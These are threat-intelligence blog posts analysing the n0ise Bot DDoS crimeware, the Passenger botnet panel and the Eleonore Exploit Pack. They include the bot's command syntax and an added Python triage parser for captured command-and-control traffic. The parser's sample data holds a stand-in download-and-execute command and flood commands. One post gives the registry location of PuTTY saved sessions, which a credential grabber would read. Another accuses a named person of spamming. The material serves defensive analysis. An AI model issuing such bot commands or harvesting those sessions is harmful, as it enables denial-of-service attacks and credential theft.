MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, computer criminology and information security in general, always from a perspective closely tied to the field of intelligence.

29.6.10

n0ise Bot. Special-purpose crimeware for DDoS attacks

DDoS attacks are not a trivial problem, and several web applications of this kind, such as BlackEnergy, have been used to run massive attack campaigns; in the case of BlackEnergy, during the conflict between Russia and Georgia.

The impact of such threats is extremely serious, and under this banner another business enters the circuit that is channelled through crimeware: a web application of German origin called n0ise Bot which, although it has not yet had much impact on the criminal ecosystem, has been on the black market for some time.

n0ise Bot is designed exclusively to recruit zombies and to execute Distributed Denial of Service attacks.

It has a minimalist design but offers the information needed to manage the zombies that will be used to carry out DDoS attacks.

The commands that can be issued through the basic configuration of this crimeware, with their field layout (fields separated by `*`), are:
  • Syn-Flood - synflood*Host*Port*Threads*Sockets
  • HTTP-Flood - httpflood*Host*Threads
  • UDP-Flood - udpflood*Host*Port*Threads*Sockets*Packetsize
  • ICMP-Flood - icmpflood*Host*Port*Threads*Sockets*Packetsize
  • Multi Stealer - steal*Link to Uploadscript
  • Download and Execute - downandexe*LinkToFile
  • Visit Page - visit*Link
  • Bot Update - update*LinkToNewBot
  • Remove Bot - remove*Name
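Since the command syntax above is all that an analyst sees on the wire between the panel and its zombies, a parser for it is the natural first tool for triaging captured C&C traffic. The following is an added example written for this post; it is not code from n0ise Bot or from its seller. The positional layout of each command is taken from the list above. My own assumptions: fields are separated by a literal `*` with no escaping, the numeric fields are plain decimal integers, and the sample commands in `SAMPLE_COMMANDS` are constructed for illustration, not captured traffic.

```python
"""Parser and triage for the '*'-delimited n0ise Bot command syntax.

Added example for this post; not code from n0ise Bot or its seller.
Field layout per command comes from the article's command list.
Assumptions (mine): '*' is a plain separator with no escaping, numeric
fields are decimal integers, and SAMPLE_COMMANDS is constructed data.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Positional field names per command keyword, in the order the article lists them.
# Note that the article lists a Port field even for icmpflood, although ICMP has no ports.
COMMAND_SPEC: Dict[str, List[str]] = {
    "synflood":   ["host", "port", "threads", "sockets"],
    "httpflood":  ["host", "threads"],
    "udpflood":   ["host", "port", "threads", "sockets", "packetsize"],
    "icmpflood":  ["host", "port", "threads", "sockets", "packetsize"],
    "steal":      ["upload_script"],   # Multi Stealer: link to upload script
    "downandexe": ["file_url"],        # Download and Execute
    "visit":      ["url"],             # Visit Page
    "update":     ["new_bot_url"],     # Bot Update
    "remove":     ["name"],            # Remove Bot
}

FLOOD_COMMANDS = {"synflood", "httpflood", "udpflood", "icmpflood"}
INT_FIELDS = {"port", "threads", "sockets", "packetsize"}


@dataclass
class BotCommand:
    name: str
    args: Dict[str, object]

    @property
    def is_ddos(self) -> bool:
        return self.name in FLOOD_COMMANDS


def parse_command(line: str) -> BotCommand:
    """Parse one command line; raise ValueError on anything malformed."""
    parts = line.strip().split("*")
    name = parts[0].lower()
    if name not in COMMAND_SPEC:
        raise ValueError(f"unknown command keyword {parts[0]!r}")
    fields, values = COMMAND_SPEC[name], parts[1:]
    if len(values) != len(fields):
        raise ValueError(f"{name}: expected {len(fields)} field(s), got {len(values)}")
    args: Dict[str, object] = {}
    for fname, raw in zip(fields, values):
        if fname in INT_FIELDS:
            if not raw.isdigit():
                raise ValueError(f"{name}: field {fname!r} must be numeric, got {raw!r}")
            num = int(raw)
            if fname == "port" and not 0 < num <= 65535:
                raise ValueError(f"{name}: port {num} out of range")
            if fname != "port" and num == 0:
                raise ValueError(f"{name}: field {fname!r} must be positive")
            args[fname] = num
        else:
            if not raw:
                raise ValueError(f"{name}: field {fname!r} is empty")
            args[fname] = raw
    return BotCommand(name, args)


@dataclass
class Triage:
    ddos: int = 0
    other: int = 0
    invalid: int = 0
    targets: Set[str] = field(default_factory=set)   # hosts named in flood commands
    errors: List[str] = field(default_factory=list)


def triage(lines: List[str]) -> Triage:
    """Classify a batch of captured commands and collect the DDoS targets."""
    result = Triage()
    for line in lines:
        try:
            cmd = parse_command(line)
        except ValueError as exc:
            result.invalid += 1
            result.errors.append(str(exc))
            continue
        if cmd.is_ddos:
            result.ddos += 1
            result.targets.add(str(cmd.args["host"]))
        else:
            result.other += 1
    return result


# Constructed sample of what an operator might send; not real captured traffic.
SAMPLE_COMMANDS = [
    "synflood*198.51.100.7*80*50*100",
    "httpflood*www.example.invalid*20",
    "udpflood*198.51.100.7*53*10*20*1024",
    "downandexe*http://www.example.invalid/payload.exe",
    "remove*n0ise",
    "synflood*198.51.100.7*99999*1*1",   # port out of range, rejected
    "bogus*whatever",                    # unknown keyword, rejected
]

if __name__ == "__main__":
    t = triage(SAMPLE_COMMANDS)
    print(f"ddos={t.ddos} other={t.other} invalid={t.invalid} targets={sorted(t.targets)}")
    for err in t.errors:
        print("  rejected:", err)
```

Run against a log of decoded C&C commands, the `targets` set gives the victims of the flood campaigns while the `other` bucket (download-and-execute, update, stealer upload) flags the commands that change what the zombie actually runs, which usually matter more to an incident responder than the floods themselves.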
The business strategy used to sell the crimeware follows the tendency to whitewash its existence through advertising displayed on the crimeware's "official" website, called Coding-Revolutions, which also sells other applications for handling malicious code and for "secure communications" under the slogan "Willkommen im Shop von neuen n0ise Malware!" (something like "Welcome to the new n0ise malware shop").

This business model has been used on other occasions to promote Unique Sploits Pack, YES Exploit System and Mariposa Botnet.

As shown in the image, n0ise Bot costs € 50 (the binary only, without the builder) or € 250 (the binary for life, including future upgrades). Transactions are made through paysafecard, a prepaid online payment service chosen because it leaves no trace of those involved in the transaction.

However, since May 2010 the developer has been distributing a second version (2.1) in which the binary still costs € 50 but the lifetime price has dropped to € 200, perhaps as a consequence of its lack of impact among computer criminals.



26.6.10

Brief review of Passenger Admin Panel

If, 5 or 6 years ago, we had talked about centralized control and management of botnets (C&C) over HTTP, at a time when botnets were operated massively through IRC channels, it would have been seen as a trend.

After the first appearance of the odd kit, demand began to run high while supply was poor. Several years later, these kits continue to set trends in crimeware and demand remains high, with the difference that supply has now grown in proportion to it.

In this scenario, every day we witness the appearance of some new web application that adds to the supply, designed exclusively to feed that demand and to facilitate the management of, and intelligence on, the offenders' "assets" (zombies). Another concrete example of this trend is Passenger Admin Panel.



As can be seen in the images, Passenger is of Russian origin and is apparently a private version or one built on demand, since there are no references to its development.

It has only three options. The first is the statistics panel, which centralises information such as the total number of zombies (in this case 16,845), the number of active zombies (582; this figure is refreshed every 60 minutes), the number of zombies recruited per day (36) and the number of victims in the last 24 hours (7,349), among other data.




The statistics go on to show data about the bot versions and the number of zombies recruited by each affiliate ID, together with the victims each one has (in this case there are two affiliates, with 16,842 and 3 zombies respectively), the status of a module interestingly called Putty Grabber with its records, and the number of operating systems involved.


The operating systems found among the victims of this botnet are:

  • Microsoft Windows 2000 Service Pack 3
  • Microsoft Windows Server 2003    
  • Microsoft Windows Server 2003 Service Pack 1 and 2
  • Microsoft Windows Server 2003 R2 Service Pack 1 and 2
  • Microsoft Windows XP
  • Microsoft Windows XP Service Pack 1, 2 and 3
  • Windows XP by Rushen 10.5 Minimal Service Pack 3
  • Windows Vista (TM) Business    
  • Windows Vista (TM) Business Service Pack 1 and 2
  • Windows Vista (TM) Home Basic
  • Windows Vista (TM) Home Basic Service Pack 1 and 2
  • Windows Vista (TM) Home Premium    
  • Windows Vista (TM) Home Premium Service Pack 1 and 2
  • Windows Vista (TM) Ultimate Service Pack 1 and 2
  • Windows Server (R) 2008 Standard Service Pack 2
Passenger can set a task to update the bot through a previously assigned URL that points to a file called u.php. However, as mentioned above, the most interesting feature for the offender is the Putty Grabber module, which displays specific information and stores sensitive data for each compromised computer. The panel does not detail what the module collects, but PuTTY keeps its saved sessions (hostnames, usernames and any proxy credentials) in the registry under HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions, so a module with this name is most plausibly harvesting those entries, which would hand the operator a ready-made list of servers the victim administers.


Undoubtedly, crimeware is a very serious problem that operates globally and on a large scale, and the constant emergence of alternatives such as the one described here is further evidence of this.

Related Information
State of the art in CRiMEPACK Exploit Pack
Siberia Exploit Pack. Another package of explois I...
RussKill. Application to perform denial of service...
JustExploit. New Exploit kit that uses vulnerabili...
DDoS Botnet. New crimeware particular purpose
T-IFRAMER. Kit for the injection of malware In-the...
Fragus. New botnet framework In-the-Wild
Liberty Exploit System. Alternatively crimeware to...
TRiAD Botnet III. Remote administration of multi-p...


23.6.10

State of the art in Eleonore Exploit Pack II

Undoubtedly, crimeware in the form of exploit packs and malware kits, whether general-purpose like ZeuS or special-purpose like RussKill, has become the crème de la crème of computer crime and synonymous with easy money for cybercriminals.

Based on this, one of the fastest-growing crimeware packages over the past six months is Eleonore Exploit Pack. It is currently on the lips of many would-be cybercriminals who use it, and of the security professionals who have noticed its impact on the crime scene because of its steadily growing following, which justifies investigating it.

Earlier this year we described how the developer of this application was releasing different versions of the crimeware; from the final version at that time (1.3.2) to the current one (1.4.1), little has changed.


The truth is that, as shown in the image, attack coverage includes a considerable number of operating systems, an aspect that has also become a trend among some exploit packs, as in the case of Siberia Exploit Pack, which even shares a similar taste in design.

But let's once again review the chronology of the emergence of the different versions:

The base of this botnet is hosted in the U.S. by the vendor Secured Private Network on ASN22298, which also hosts rogue/FakeAV malware, other trojans, ZeuS variants and even some Koobface families. It is maintained through the business services of QuadraNet, led by an Israeli spammer named Ilan Mishan, also well known in the underground for providing the resources needed to host spam, scam, phishing and pornography activities, including through other companies such as OC-3 Networks and PacificRack tied to QuadraNet.




Despite having its C&C in the U.S., the highest rate of activity is in Eastern Europe, specifically in Ukraine, where the largest number of computers have been breached by one of the many exploits spread by Eleonore Exploit Pack.


On the other hand, it is interesting to look at the web pages that refer visitors to Eleonore's pre-compiled exploits. The lists are usually very long and quite varied in subject, typically pages with sexually explicit content, FakeAV distribution, online casinos and online pharmacies, among others.

Also closely linked to the business scenario these criminal activities represent: affiliate programs. In this case, one is promoted for the purchase of web traffic, where the core of the business is making money through advertising injected into web pages and displayed in pop-up windows.

Related information
State of the art in Eleonore Exploit Pack
Eleonore Exploits Pack. New Crimeware In-the-Wild
New version of Eleonore Exploits Pack In-the-Wild
Phishing campaign aimed at players Zynga
